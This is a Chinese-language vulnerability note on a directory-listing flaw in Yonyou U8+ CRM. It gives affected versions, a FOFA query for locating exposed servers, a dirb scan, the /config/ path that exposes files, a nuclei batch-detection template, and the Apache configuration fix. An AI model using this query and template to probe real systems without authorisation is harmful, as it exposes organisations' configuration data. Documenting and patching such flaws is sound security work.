免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!

一、漏洞名称

用友U8+ CRM目录遍历漏洞

二、漏洞影响

此漏洞影响U8 V16.5, V16.1, V16.0, V15.1, V15.0, V13版本

三、漏洞描述

用友U8+CRM存在目录遍历漏洞,攻击者可利用该漏洞获取敏感信息。

四、资产FOFA搜索语句

body="用友U8CRM"

五、漏洞复现

这个漏洞顾名思义,再结合官方公告中的修复方案描述,猜测可能是config目录,目录遍历类的直接挂上src挖掘工具dirb试一下

dirb http://x.x.x.x:8072/

访问http://x.x.x.x:8072/config/

直接就复现成功了,所以说挖不到0day的时候就拿工具跑一跑,可能就有惊喜。

六、批量漏洞检测poc


id: yonyou-u8-crm-directory-traversal

info:
  name: 用友U8+ CRM目录遍历漏洞
  author: fgz
  severity: high
  reference:
    - none
  metadata:
    fofa-query: body="用友U8CRM"
    veified: true
  tags: yonyou

http:
  - method: GET
    path:
      - "{{BaseURL}}/config/"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
        
      - type: word
        part: body
        words:
          - 'Index of /config'
        condition: and
.\nuclei.exe -t .\HVVault-main\docs\用友\yonyou-u8-crm-directory-traversal.yaml -u http://x.x.x.x:8072

七、漏洞修复

可以修改配置文件,即修改apache配置,将Options Indexes FollowSymLinks修改为Options FollowSymLinks,不在允许列出目录。

或者将补丁压缩包中updateApConf.cmd放到U8SOFT\turbocrm70\apache\conf目录下执行,执行完之后在u8应用管理中重启apache服务。此脚本会自动完成配置。